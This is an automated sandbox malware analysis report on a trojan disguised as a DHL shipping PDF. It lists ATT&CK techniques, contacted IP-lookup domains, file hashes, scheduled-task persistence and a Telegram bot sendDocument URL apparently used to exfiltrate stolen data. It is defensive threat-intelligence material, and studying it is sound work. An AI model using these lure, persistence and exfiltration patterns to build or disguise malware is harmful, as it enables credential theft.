Source: Yara match	File source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 6160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 7156, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	23 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	51%	Virustotal		Browse
DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	34%	ReversingLabs	Win32.Trojan.CrypterX

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	34%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	51%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.48.1	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://g.live.com/odclientsettings/Prod1C:	edb.log.15.dr	false	high
https://reallyfreegeoip.org/xml/8.46.123.189l	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.comd	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/	PZgkJsntUXo.exe, 0000000D.00000002.2176124886.00000000013B7000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.orgd	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000297B000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.000000000311B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189d	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000297B000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.000000000311B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.orgd	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 0000000F.00000003.1203412931.000001799CF00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.dr	false	high
http://crl.ver)	svchost.exe, 0000000F.00000002.2179521971.000001799D000000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000294C000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030EC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/?Please	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, PZgkJsntUXo.exe.0.dr	false	high
http://checkip.dyndns.com	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/d	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.969436343.0000000002A8B000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 00000009.00000002.1003616950.000000000324B000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.0000000003081000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, PZgkJsntUXo.exe.0.dr	false	high
https://api.telegram.org/bot-/sendDocument?chat_id=	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2179384145.000000000295F000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2179488891.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, PZgkJsntUXo.exe, 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States		16989	UTMEMUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1636421
Start date and time:	2025-03-12 19:07:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/19@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 138 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.199.214.10, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:08:10	API Interceptor	2x Sleep call for process: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe modified
14:08:12	API Interceptor	27x Sleep call for process: powershell.exe modified
14:08:14	API Interceptor	2x Sleep call for process: PZgkJsntUXo.exe modified
14:08:37	API Interceptor	2x Sleep call for process: svchost.exe modified
19:08:13	Task Scheduler	Run new task: PZgkJsntUXo path: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	ySUB97Jq80.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.shlomi.app/9rzh/
	hQaXUS5gt0.exe	Get hash	malicious	FormBook	Browse	www.newanthoperso.shop/3nis/
	6nA8ZygZLP.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	UhuGtHUgHf.exe	Get hash	malicious	FormBook	Browse	www.enoughmoney.online/z9gb/
	Bill_of_Lading_20250307_pdf.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	Stormwater Works Drawings Spec.js	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	Shipment Delivery No DE0093002-PDF.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/tking3/five/fre.php
	Remittance_CT022024.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/fix/five/fre.php
	http://microsoft-sharepoint4543464633.pages.dev/index-2jc93/	Get hash	malicious	HTMLPhisher	Browse	microsoft-sharepoint4543464633.pages.dev/index-2jc93/
	install.exe	Get hash	malicious	Babadeda	Browse	api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated
132.226.247.73	PENDING PAYMENT FOR March SOA.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	kissingwithbestexperiencedgirlfriendonhereformenice.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	PO202503S.xlsm	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_FEBQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	checkip.dyndns.org/
	BL-INVOICE DOCUMENTS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	fw5476UX6g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	TpHHp3vAuM.exe	Get hash	malicious	CryptOne, Snake Keylogger	Browse	checkip.dyndns.org/
	oR7Y7ZxJLU.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	hwk4b4iuNV.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	QUOTATION_FEBQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	193.122.6.168
	PENDING PAYMENT FOR March SOA.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Yeni Sat#U0131nalma Sipari#U015fi.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	MALZEME G_0017 TABANCA SPREY NOZUL.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Way bill & Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	file.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	file.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	#rfq=O250116 - #U304a#U3088#U3073#U8cfc#U5165#U5951#U7d04- Offer Z01G-00008D SUPPLY - H64PO.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	PAGOS RETRASADOS.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
reallyfreegeoip.org	QUOTATION_FEBQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	104.21.16.1
	PENDING PAYMENT FOR March SOA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	Yeni Sat#U0131nalma Sipari#U015fi.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.96.1
	MALZEME G_0017 TABANCA SPREY NOZUL.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	Way bill & Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	file.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.48.1
	file.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.96.1
	#rfq=O250116 - #U304a#U3088#U3073#U8cfc#U5165#U5951#U7d04- Offer Z01G-00008D SUPPLY - H64PO.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	PAGOS RETRASADOS.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	signed contract 01.xls	Get hash	malicious	Unknown	Browse	104.21.68.120
	https://www.deliveryoka.com/webservice_ionic/captchav2.html?vv	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	1.1.1.1
	Document.xls	Get hash	malicious	Unknown	Browse	104.21.68.120
	signed contract 01.xls	Get hash	malicious	Unknown	Browse	104.21.68.120
	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	172.67.148.163
	Document.xls	Get hash	malicious	Unknown	Browse	104.21.68.120
	order 03_25.docx.doc	Get hash	malicious	Unknown	Browse	104.21.68.120
	signed contract 01.xls	Get hash	malicious	Unknown	Browse	104.21.68.120
	[EXTERNAL]Fax_ Payment ID_ #e890269ae2933d6648f91073751dc66afd979007-3_11_2025.eml	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	104.16.2.189
	Document.xls	Get hash	malicious	Unknown	Browse	104.21.68.120
UTMEMUS	PENDING PAYMENT FOR March SOA.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	kissingwithbestexperiencedgirlfriendonhereformenice.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	PO202503S.xlsm	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	QUOTATION_FEBQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	132.226.247.73
	EM#U0130R_7880330875661236965345096345789_3479653.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	BL-INVOICE DOCUMENTS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	uyqMsPsOG1.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	PENDING PAYMENT FOR March SOA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	Yeni Sat#U0131nalma Sipari#U015fi.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.48.1
	MALZEME G_0017 TABANCA SPREY NOZUL.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	Way bill & Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	file.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.48.1
	file.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.48.1
	R9rwNLVzpr.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.21.48.1
	#rfq=O250116 - #U304a#U3088#U3073#U8cfc#U5165#U5951#U7d04- Offer Z01G-00008D SUPPLY - H64PO.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	PAGOS RETRASADOS.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7067062693952502
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqx:2JIB/wUKUKQncEmYRTwh09
MD5:	8E661810A6BAC2E47CAF394D9EB8FBC4
SHA1:	81420A7FB4AF95601F4CB4C8560A594504DD095F
SHA-256:	DD75DBD201963BC5356BF4E089D299A3F8831FB25062313D8A24FBBF573A3655
SHA-512:	942CE307CB5D0FE7BC8720DE97ED4F8A479262EC80C6EA446E4770059CB426C9984407B5F4DB37DC27015ABFE8B69FEF2FF99BE1673B2C6E13D8E8F215BAEAD2
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x58c92a42, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7899856651351963
Encrypted:	false
SSDEEP:	1536:7SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:7azaPvgurTd42UgSii
MD5:	DFF97D482EE3C6476C3C95E5615B249D
SHA1:	51C190AB1DF86053F38512AAB5572CCF337A8373
SHA-256:	9151CE1CBFBF3EADA31357597E47E21ED4DE1D82E7FF1F703E7CC420A47EB0AE
SHA-512:	A993DEF5477F04C9D781B0033AB980BB28EEC89519C813CAE1F44DBECF8FEB58821A0DD6AB8C5EE1017DD4ED0EA0B586664A6C2684714644C96179ACBE896C50
Malicious:	false
Preview:	X.*B... ...............X\...;...{......................0.`.....42...{5.%....}U.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................h.@.%....}u................./'..%....}u..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08176661324989457
Encrypted:	false
SSDEEP:	3:PE8Ye3Tvzgveqt/57Dek3JZ4vaAllEqW3l/TjzzQ/t:PE8z3jMvPR3t+aAmd8/
MD5:	06F28209F8811E84B1FBE510FABF905B
SHA1:	D76C4FA2C505632E5E9815F63C73DB8DC8702439
SHA-256:	22C11B11AA4F14E3984BD259DB79B622FECDA4BC847D534E4C606DCADBDF185C
SHA-512:	627F1BA0CCDECD114FB2E9772E93315F4FFCAFF328619F5A8FA7E131BE0805D8A4BE66F7E779334E027AFA10D0D73EA48D3B8ACE22413B760136EC1D1CB0DBAC
Malicious:	false
Preview:	E.<......................................;...{..%....}u.42...{5.........42...{5.42...{5...Y.42...{59................/'..%....}u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.log

Download File

Process:	C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
MD5:	3978978DE913FD1C068312697D6E5917
SHA1:	1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
SHA-256:	33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
SHA-512:	78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PZgkJsntUXo.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
MD5:	3978978DE913FD1C068312697D6E5917
SHA1:	1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
SHA-256:	33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
SHA-512:	78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	16AD599332DD2FF94DA0787D71688B62
SHA1:	02F738694B02E84FFE3BAB7DE5709001823C6E40
